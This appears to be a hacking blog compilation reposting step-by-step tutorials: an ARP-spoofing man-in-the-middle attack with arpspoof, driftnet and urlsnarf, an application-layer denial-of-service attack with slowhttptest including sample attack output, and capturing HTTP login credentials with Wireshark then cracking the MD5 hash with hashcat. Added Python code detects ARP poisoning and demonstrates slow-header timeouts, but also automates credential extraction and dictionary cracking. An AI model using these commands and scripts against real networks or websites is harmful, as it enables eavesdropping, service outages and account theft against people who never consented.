Types of Hacker

Let's look at the categories of hackers on the basis of their knowledge. Coders: the real hackers are the coders, the ones who revise the methods and create the tools that end up available in the market. Coders can find security holes and weaknesses in software and write their own exploits, and they can use those same exploits to test and build fully patched and secure systems.

Concept of Ethical Hacking

Hi guys, this is my first post; I hope to present hacking A to Z 101. Let's begin :) Hacking: the art of exploring various security breaches is termed hacking. Computer hackers have been around for many years. Since the Internet became widely used around the world, we have started to hear more and more about hacking.

Why Hackers Hack?

The main reason hackers hack is because they can. Hacking is a casual hobby for some hackers; they just hack to see what they can and cannot break into, usually by testing their own systems. Many hackers are people who were pushed out of corporate and government IT and security organisations; they try to damage the organisation's reputation by attacking it or stealing its information.

Steps Performed By hackers

1) Reconnaissance: performing reconnaissance on the target
2) Scanning: scanning and enumeration
3) Gaining access
4) Maintaining access: keeping access and placing backdoors
5) Clearing tracks: covering tracks or clearing logs

Prevention from Hackers

What can be done to prevent hackers from finding new holes in software and exploiting them? Information security research teams exist to try to find these holes and notify vendors before they are exploited. There is a beneficial competition going on between the hackers securing systems and the hackers breaking into them. This competition gives us better and stronger security, as well as more complex and sophisticated attack techniques.


Friday, February 27, 2015

Man in the middle attack

Kali Linux Man In The Middle Attack


Today's tutorial is about the Kali Linux man in the middle attack: how to perform a man in the middle attack using Kali Linux, step by step.
I believe most of you already know the concept of a man in the middle attack, but if you don't, here is the definition from Wikipedia.
The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
Scenario:
This is the simple scenario, which I tried to draw in a picture:
Victim IP address : 192.168.8.90
Attacker network interface : eth0; with IP address : 192.168.8.93
Router IP address : 192.168.8.8
Requirements:
1. Arpspoof
2. Driftnet
3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack :

1. Open your terminal (CTRL + ALT + T is the Kali shortcut) and configure the Kali Linux machine to allow packet forwarding. As the man in the middle, Kali must act as the router between the real router and the victim, so IPv4 forwarding (the net.ipv4.ip_forward sysctl) has to be enabled; otherwise the victim simply loses connectivity as soon as the spoofing starts. The original post links to a separate tutorial on setting up packet forwarding in Linux.
2. You can make the terminal easier to monitor by splitting the Kali Linux terminal window.
3. The next step is to set up arpspoof between the victim and the router, telling the victim that our MAC address belongs to the router:
arpspoof -i eth0 -t 192.168.8.90 192.168.8.8
4. Then run a second arpspoof in the other direction, telling the router that our MAC address belongs to the victim, so that packets from the router to the victim also pass through us (arpspoof takes a single host argument, so the target is given with -t):
arpspoof -i eth0 -t 192.168.8.8 192.168.8.90
5. After steps three and four, every packet sent or received by the victim should be going through the attacker machine.
6. Now we can try to use driftnet to monitor all victim image traffic. According to its website,
Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.
7. To run driftnet, we just run this
driftnet -i eth0
When the victim browses a website with images, driftnet captures all of the image traffic and displays it in its window.
To stop driftnet, just close the driftnet window or press CTRL + C in the terminal
8. For the next step we will try to capture the website addresses the victim visits by using urlsnarf. To use urlsnarf, just run
urlsnarf -i eth0
and urlsnarf will start logging, in Common Log Format, every URL the victim machine requests over HTTP.
9. When the victim browses a website, the attacker sees the address visited.
Here is the video in case you can't get the text explanations above.
Conclusion:
1. To change or spoof the attacker's MAC address, see the tutorial about how to change the Kali Linux MAC address.
2. Driftnet and urlsnarf are passive and therefore hard to detect, but the ARP spoofing that feeds them is not: on the victim or the router the ARP cache suddenly shows the gateway's IP and the attacker's IP with the same MAC address, and tools such as arpwatch alert on exactly that change. You can also try to find devices on your network whose interface is in promiscuous mode, since those have the ability to sniff the network traffic.
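As an added example of the detection hinted at in point 2 (my own code, not from the original post or from the dsniff tools; the neighbour-table samples and every MAC address in them are constructed for the demo), the following Python parses `ip neigh show` output from the victim's side of the scenario above and flags the two things arpspoof leaves behind: one MAC claimed by several IPs, and a gateway MAC that differs from the one recorded on a clean network.

```python
import re
from collections import defaultdict

# Constructed sample of `ip neigh show` on the victim (192.168.8.90) while the
# two arpspoof commands above are running: the router's IP (192.168.8.8) now
# maps to the attacker's MAC, which is also the MAC of the attacker's own
# address (192.168.8.93). All MACs are made up.
POISONED_NEIGH = """\
192.168.8.8 dev eth0 lladdr 00:0c:29:5e:12:34 REACHABLE
192.168.8.93 dev eth0 lladdr 00:0c:29:5e:12:34 REACHABLE
192.168.8.20 dev eth0 lladdr 3c:97:0e:aa:bb:cc STALE
192.168.8.21 dev eth0  FAILED
"""

# The same table before the attack, with the router's real (made-up) MAC.
CLEAN_NEIGH = """\
192.168.8.8 dev eth0 lladdr 50:c7:bf:00:11:22 REACHABLE
192.168.8.93 dev eth0 lladdr 00:0c:29:5e:12:34 STALE
192.168.8.20 dev eth0 lladdr 3c:97:0e:aa:bb:cc STALE
"""

NEIGH_LINE = re.compile(r"^(\S+)\s+dev\s+(\S+)\s+lladdr\s+([0-9a-f:]{17})", re.I)


def parse_neigh(text):
    """Map IP -> MAC from `ip neigh show` lines; entries without lladdr (FAILED/INCOMPLETE) are skipped."""
    table = {}
    for line in text.splitlines():
        match = NEIGH_LINE.match(line.strip())
        if match:
            table[match.group(1)] = match.group(3).lower()
    return table


def shared_macs(table):
    """Return {mac: [ips]} for every MAC claimed by more than one IP (the arpspoof signature)."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_hijacked(table, gateway_ip, known_mac):
    """True if the gateway's cached MAC differs from the one recorded on a clean network."""
    current = table.get(gateway_ip)
    return current is not None and current != known_mac.lower()


def check(neigh_text, gateway_ip, known_gateway_mac):
    """Run both checks over one dump of the neighbour table."""
    table = parse_neigh(neigh_text)
    return {
        "shared": shared_macs(table),
        "gateway_hijacked": gateway_hijacked(table, gateway_ip, known_gateway_mac),
    }


if __name__ == "__main__":
    # Replace the constructed samples with the output of `ip neigh show` on a real host.
    for label, sample in (("clean", CLEAN_NEIGH), ("poisoned", POISONED_NEIGH)):
        print(label, check(sample, "192.168.8.8", "50:c7:bf:00:11:22"))
```

Feed it the live output of `ip neigh show` from a host you suspect is being poisoned, and baseline the gateway MAC first: routers running VRRP/HSRP, or a router with several addresses on one interface, legitimately answer for multiple IPs with one MAC, so a shared MAC is a signal to investigate rather than proof. To stop the poisoning on a critical host, pin the gateway with `ip neigh replace 192.168.8.8 lladdr <real mac> nud permanent dev eth0`; the spoofed replies are then ignored for that entry.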
Hope you found it useful :-)

original post
http://www.hacking-tutorial.com/hacking-tutorial/kali-linux-man-middle-attack/#sthash.PsvwCOt8.dpbs


Attack a website using slowhttptest from Linux and Mac

Attack a website using slowhttptest from Linux and Mac

SlowHTTPTest is a highly configurable tool that simulates some Application Layer Denial of Service attacks. It works on majority of Linux platforms, OSX and Cygwin – a Unix-like environment and command-line interface for Microsoft Windows.
It implements the most common low-bandwidth application-layer DoS attacks, such as Slowloris, Slow HTTP POST and the Slow Read attack (based on the TCP persist timer exploit), all of which drain the server's pool of concurrent connections, as well as the Apache Range Header attack, which causes very significant memory and CPU usage on the server.
Slowloris and Slow HTTP POST rely on the fact that HTTP, by design, requires a request to be completely received by the server before it is processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. If too many resources are kept busy this way, the result is a denial of service. The tool sends partial HTTP requests (an unfinished header block in Slowloris mode, an unfinished body in slow POST mode), trying to exhaust the target HTTP server.
The Slow Read attack aims at the same resources as Slowloris and slow POST, but instead of prolonging the request it sends a legitimate HTTP request and then reads the response slowly, advertising a tiny TCP receive window so the server has to keep the response buffered.
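To make the Slowloris / slow POST mechanism concrete, here is an added example that is not part of the original post or of the slowhttptest project: a toy single-connection HTTP header reader, run once with no limit on how long the header block may take (the vulnerable default) and once with a total deadline for the whole block, against a constructed client that drips one header line at a time and never sends the terminating blank line. The header lines, the 0.15 s drip interval and the 0.4 s deadline are my own choices; nothing here is captured traffic.

```python
import socket
import threading
import time

# Constructed attack traffic: a well-formed POST whose header block never ends
# (no blank line), drip-fed one line at a time the way slowhttptest -H/-B does.
SLOW_HEADERS = [
    b"POST /resources/loginform.html HTTP/1.1\r\n",
    b"Host: target.example\r\n",
    b"Content-Length: 8192\r\n",
] + [b"X-pad-%d: a\r\n" % i for i in range(5)]
DRIP_INTERVAL = 0.15   # seconds between header lines; 8 lines -> about 1.2 s of drip


def read_request_headers(conn, header_deadline):
    """Read one connection until the blank line that ends the header block.

    header_deadline is the total number of seconds the whole header block may
    take (None = wait forever, the vulnerable default). Returns 'complete',
    'timeout' (deadline hit, worker freed) or 'closed' (peer went away first).
    """
    start = time.monotonic()
    buf = b""
    while b"\r\n\r\n" not in buf:
        if header_deadline is not None:
            remaining = header_deadline - (time.monotonic() - start)
            if remaining <= 0:
                return "timeout"
            conn.settimeout(remaining)   # deadline on the whole block, not per read
        try:
            chunk = conn.recv(4096)
        except socket.timeout:
            return "timeout"
        if not chunk:
            return "closed"
        buf += chunk
    return "complete"


def slow_client(port, lines, interval):
    """Connect and trickle `lines` out, sleeping between them; never finish the request."""
    sock = socket.create_connection(("127.0.0.1", port))
    try:
        for line in lines:
            sock.sendall(line)
            time.sleep(interval)
    except OSError:
        pass                       # the server dropped us, which is the point
    finally:
        sock.close()


def run_trial(header_deadline, lines=SLOW_HEADERS, interval=DRIP_INTERVAL):
    """Serve a single connection from the drip client.

    Returns (status, seconds the server's worker was tied up by that one client).
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    client = threading.Thread(target=slow_client, args=(port, lines, interval), daemon=True)
    client.start()
    conn, _ = listener.accept()
    busy_since = time.monotonic()
    try:
        status = read_request_headers(conn, header_deadline)
    finally:
        conn.close()
        listener.close()
    client.join()
    return status, time.monotonic() - busy_since


if __name__ == "__main__":
    for deadline in (None, 0.4):
        status, busy = run_trial(deadline)
        print(f"header deadline={deadline}: result={status}, worker held for {busy:.2f}s")
```

On the vulnerable run the worker stays blocked for as long as the client keeps the drip going (about 1.2 s here; with slowhttptest -i 110 it would be minutes per connection, multiplied by the -c 1000 connections). With the deadline the worker is freed after 0.4 s no matter how many bytes trickle in. A per-read idle timeout alone does not help, because each drip arrives before it expires; the protection is a deadline on the whole header (and body) read, which is what Apache's mod_reqtimeout RequestReadTimeout directive and nginx's client_header_timeout provide.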




Installation


Installation for Kali Linux users

For Kali Linux users, install via apt-get .. (life is good!)
root@kali:~# apt-get install slowhttptest 
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  slowhttptest
0 upgraded, 1 newly installed, 0 to remove and 25 not upgraded.
Need to get 29.6 kB of archives.
After this operation, 98.3 kB of additional disk space will be used.
Get:1 http://http.kali.org/kali/ kali/main slowhttptest amd64 1.6-1kali1 [29.6 kB]
Fetched 29.6 kB in 1s (21.8 kB/s)     
Selecting previously unselected package slowhttptest.
(Reading database ... 376593 files and directories currently installed.)
Unpacking slowhttptest (from .../slowhttptest_1.6-1kali1_amd64.deb) ...
Processing triggers for man-db ...
Setting up slowhttptest (1.6-1kali1) ...
root@kali:~#


For other Linux distributions

The tool is distributed as portable package, so just download the latest tarball from Downloads section, extract, configure, compile, and install:
$ tar -xzvf slowhttptest-x.x.tar.gz

$ cd slowhttptest-x.x

$ ./configure --prefix=PREFIX

$ make

$ sudo make install

Where PREFIX must be replaced with the absolute path where slowhttptest tool should be installed.
You need libssl-dev to be installed to successfully compile the tool. Most systems would have it.
Alternatively

Mac OS X

Using Homebrew:
brew update && brew install slowhttptest

Linux

Try your favorite package manager, some of them are aware of slowhttptest (Like Kali Linux).

Usage

slowhttptest is flexible and can run several kinds of test. Following are a few usage examples.

Example of usage in slow message body mode

slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Same test with graph
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3

Example of usage in slowloris mode

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Same test with graph
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3

Example of usage in slow read mode with probing through proxy

Here the proxy at x.x.x.x:8080 is used to probe the website's availability from an IP address different from the one doing the attack:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080

Output

Depending on the verbosity level, the output ranges from a simple heartbeat message generated every 5 seconds showing the status of the connections (verbosity level 1) to a full traffic dump (verbosity level 4).
-g option would generate both CSV file and interactive HTML based on Google Chart Tools.
Here is a sample screenshot of generated HTML page
HTML Report from SlowHTTPTest

that contains graphically represented connections states and server availability intervals, and gives the picture on how particular server behaves under specific load within given time frame.
CSV file can be used as data source for your favorite chart building tool, like MS Excel, iWork Numbers, or Google Docs.
The last message you'll see is the exit status, which hints at the reason the program terminated:
"Hit test time limit" - the program reached the time limit specified with the -l argument
"No open connections left" - the peer closed all connections
"Cannot establish connection" - no connections were established during the first N seconds of the test, where N is either the value of the -i argument or 10 if not specified. This happens if there is no route to the host or the remote peer is down
"Connection refused" - the remote peer doesn't accept connections (from you only? use a proxy to probe) on the specified port
"Cancelled by user" - you pressed Ctrl-C or sent SIGINT in some other way
"Unexpected error" - should never happen

Sample output for a real test

I’ve done this test in a sample server and this is what I’ve seen from both attacking and victim end.

From attackers end

So, I am collecting stats and attacking www.localhost.com with 1000 connections.
root@kali:~# slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.localhost.com -x 10 -p 3

Tue Sep 23 11:22:57 2014:
    slowhttptest version 1.6
 - https://code.google.com/p/slowhttptest/ -
test type:                        SLOW BODY
number of connections:            1000
URL:                              http://www.localhost.com/
verb:                             FAKEVERB
Content-Length header value:      8192
follow up data max size:          22
interval between follow up data:  110 seconds
connections per seconds:          200
probe connection timeout:         3 seconds
test duration:                    240 seconds
using proxy:                      no proxy 

Tue Sep 23 11:22:57 2014:
slow HTTP test status on 85th second:

initializing:        0
pending:             23
connected:           133
error:               0
closed:              844
service available:   YES
^CTue Sep 23 11:22:58 2014:
Test ended on 86th second
Exit status: Cancelled by user
CSV report saved to my_body_stats.csv
HTML report saved to my_body_stats.html

From victim server end:

rootuser@localhost [/home]# pgrep httpd | wc -l
151
Total number of httpd connections jumped to 151 within 85 seconds. (I’ve got a fast Internet!)
And of course I want to see what's in my /var/log/messages:
rootuser@someserver [/var/log]# tail -100 messages | grep Firewall

Sep 23 11:43:39 someserver: IP 1.2.3.4 (XX/Anonymous/1-2-3-4) found to have 504 connections
As you can see, I managed to crank up 504 connections from a single IP in less than 85 seconds, which is more than enough to bring down a server (most small servers and VPSs, for sure).
To make it worse, you can do it from Windows, Linux and even a Mac. I am starting to wonder whether you can do it using a jailbroken iPhone 6 Plus over the air (4G+ is fast), or a Galaxy Note 4; I can do it using my old (rooted) Galaxy Nexus, and of course good old Raspberry Pi.
original post
http://www.darkmoreops.com/2014/09/23/attacking-website-using-slowhttptest/

Hack website password using WireShark

Hack website password using WireShark 

good article

Did you know that every time you fill in your username and password on a website and press ENTER, you are sending your password? Well, of course you know that; how else are you going to authenticate yourself to the website? But (yes, there is a small but) when a website lets you authenticate over plain HTTP, it is very simple to capture that traffic and analyse it later from any machine on the LAN (and even over the Internet). That means someone can capture the website password for any site that uses plain HTTP for authentication. To do it over the Internet you need to sit on a gateway or some other central point the traffic is routed through (an ISP or backbone router would do, if you have access to one).
Doing it from a LAN is easy, and at the same time it makes you wonder how insecure HTTP really is. You could do this on your home network, your work network, or a school, college or university network, provided your machine actually sees the victim's frames: on a hub or an open wireless network that just means putting your card into promiscuous (or monitor) mode, while on a switched network you only receive frames addressed to you, so you need a mirror port or an ARP spoofing setup like the one in the man in the middle tutorial above.
So let's try this on a simple website. I will hide part of the website name (they are nice people and I respect their privacy). For the sake of this guide I will show everything done on a single machine; as for you, try it between two VirtualBox/VMWare/physical machines.
p.s. Note that a switch forwards unicast frames only to the port of the destination host, so a plain capture on a switched network will not show other hosts' traffic.


Step 1: Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to
Application >  Kali Linux > Top 10 Security Tools > Wireshark
In Wireshark go to Capture > Interfaces and tick the interface that applies to you. In my case I am using a wireless USB card, so I selected wlan0.

Hack website password using WireShark - darkMORE Ops -1

Ideally you could just press the Start button here and Wireshark will start capturing traffic. In case you missed this, you can always start capturing by going back to Capture > Interfaces > Start.
Hack website password using WireShark - darkMORE Ops -2

Step 2: Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing them. I opened a browser and signed in a website using my username and password. When the authentication process was complete and I was logged in, I went back and stopped the capture in Wireshark.
Usually you see a lot of data in Wireshark. However, we are only interested in POST data.

Why POST only?

Because when you type in your username and password and press the Login button, the browser issues a POST request (in short: you are sending data to the remote server).
To filter all traffic and locate POST data, type in the following in the filter section
http.request.method == "POST"
See screenshot below. It is showing 1 POST event.
Hack website password using WireShark - darkMORE Ops -3

Step 3: Analyze POST data for username and password

Now right-click on that line and select Follow TCP Stream.
Hack website password using WireShark - darkMORE Ops -4

This will open a new Window that contains something like this:

HTTP/1.1 302 Found 
Date: Mon, 10 Nov 2014 23:52:21 GMT 
Server: Apache/2.2.15 (CentOS) 
X-Powered-By: PHP/5.3.3 
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" 
Set-Cookie: non=non; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ 
Set-Cookie: password=e4b7c855be6e3d4307b8d6ba4cd4ab91; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ 
Set-Cookie: scifuser=sampleuser; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ 
Location: loggedin.php 
Content-Length: 0 
Connection: close 
Content-Type: text/html; charset=UTF-8
I’ve highlighted the user name and password field.
So in this case,
  1. username: sampleuser
  2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91
But hang on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can't be a real password; 32 hex characters looks like a hash value.
Two things are worth noticing here. First, what we are looking at is the server's response: it hands the hashed password back in a cookie, presumably to keep the user logged in, so whoever captured this stream can replay the cookie as-is and does not even need to crack anything. Second, some websites don't hash the password at all, even during sign-on; for those you already have the username and password in the POST body. In this case, let's go a bit further and identify the hash value.

Step 4: Identify hash type

I will use hash-identifier to find out which type of hash is that. Open terminal and type in hash-identifier and paste the hash value. hash-identifier will give you possible matches.
See screenshot below:
Hack website password using WireShark - darkMORE Ops -6

hash-identifier rules out things like Domain Cached Credentials and lists MD5 first, and a 32-character hex string coming from a PHP site is most likely an unsalted MD5 (MD4 and NTLM have the same length, so keep them in mind if MD5 cracking fails).
I can crack that using hashcat or cudahashcat. There’s an extensive guide on how to do that here.

Step 5: Cracking MD5 hashed password

I can easily crack this simple password using hashcat or similar softwares.
root@kali:~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat32 -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat64 -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Because this was a simple password that existed in my password list, hashcat cracked it very easily.


Our final outcome looks like this:
  1. username: sampleuser
  2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword
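The whole chain of steps 2 to 5 as an added example (my own code, not from the original post, Wireshark, hash-identifier or hashcat): a small Python script that parses text in the shape of Wireshark's Follow TCP Stream output, pulls the form fields out of the POST body and the cookies out of the server's reply, classifies the password value by length the way hash-identifier does, and runs the same dictionary attack that hashcat -m 0 -a 0 performs, against a five-word stand-in for rockyou.txt. The stream, the host name, the password winter2014 and its digest are all constructed for the demo; the hash shown on the page is not used.

```python
import hashlib
import re
from urllib.parse import parse_qs

# Constructed stand-in for rockyou.txt.
WORDLIST = ["123456", "password", "letmein", "winter2014", "qwerty"]

# Constructed credential: the password the "victim" types and the unsalted MD5
# the site sends around. Computed at runtime, so it is not the page's hash.
SAMPLE_PASSWORD = "winter2014"
SAMPLE_DIGEST = hashlib.md5(SAMPLE_PASSWORD.encode()).hexdigest()


def build_sample_stream():
    """Text shaped like Follow TCP Stream for a plain-HTTP login: POST, then the 302 reply."""
    body = f"username=sampleuser&password={SAMPLE_DIGEST}&submit=Login"
    request = (
        "POST /login.php HTTP/1.1\r\n"
        "Host: www.example.test\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n" + body
    )
    response = (
        "HTTP/1.1 302 Found\r\n"
        "Server: Apache/2.2.15 (CentOS)\r\n"
        f"Set-Cookie: password={SAMPLE_DIGEST}; path=/\r\n"
        "Set-Cookie: scifuser=sampleuser; path=/\r\n"
        "Location: loggedin.php\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return request + response


def parse_http_messages(stream):
    """Walk a request/response stream, using Content-Length to find each body.

    Returns a list of (start_line, headers, body); headers maps a lower-cased
    name to the list of values seen, because Set-Cookie repeats.
    """
    messages = []
    rest = stream
    while rest:
        head, sep, rest = rest.partition("\r\n\r\n")
        if not sep:
            break
        lines = head.split("\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers.setdefault(name.strip().lower(), []).append(value.strip())
        length = int(headers.get("content-length", ["0"])[0])
        body, rest = rest[:length], rest[length:]
        messages.append((lines[0], headers, body))
    return messages


def credentials_from_stream(stream):
    """Return (form fields from the POST body, cookies the server set)."""
    form, cookies = {}, {}
    for start_line, headers, body in parse_http_messages(stream):
        if start_line.startswith("POST "):
            form = {k: v[0] for k, v in parse_qs(body).items()}
        elif start_line.startswith("HTTP/"):
            for cookie in headers.get("set-cookie", []):
                name, _, value = cookie.split(";", 1)[0].partition("=")
                cookies[name.strip()] = value.strip()
    return form, cookies


HEX_LENGTHS = {32: "MD5 (or MD4/NTLM, same length)", 40: "SHA-1", 64: "SHA-256"}


def classify(value):
    """Rough equivalent of hash-identifier for the unsalted hex digests seen in web forms."""
    if re.fullmatch(r"[0-9a-f]+", value, re.I) and len(value) in HEX_LENGTHS:
        return HEX_LENGTHS[len(value)]
    return "not a recognised hex digest (plaintext?)"


def crack_md5(hexdigest, wordlist):
    """Dictionary attack, what hashcat -m 0 -a 0 does at scale: hash each candidate and compare."""
    target = hexdigest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


if __name__ == "__main__":
    form, cookies = credentials_from_stream(build_sample_stream())
    digest = form["password"]
    print("username:", form["username"])
    print("password field:", digest, "->", classify(digest))
    print("cookie replayable without cracking:", cookies.get("password") == digest)
    print("cracked:", crack_md5(digest, WORDLIST))
```

The replay check is the part worth keeping in mind: when the site puts the same digest in a cookie, the cracking step is optional for an attacker, so client-side hashing on its own does not protect an HTTP login.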

Conclusion

Well, to be honest, not every website owner will implement SSL to protect the login (at the time of writing, in 2014, a commercial certificate could cost up to 1500$ per hostname). But the least website owners (public ones where anyone can register) should do is hash the password during the login procedure. That way the password itself is at least not visible on the wire, which is one more hurdle for someone trying to capture website passwords. Bear in mind that it is only a hurdle: whatever the client sends, plaintext or hash, can be replayed by whoever captured it, so hashing on the client is no substitute for TLS.
Enjoy and use this guide responsibly.

credit goes to  original article
http://www.darkmoreops.com/2014/11/11/hack-website-password-using-wireshark/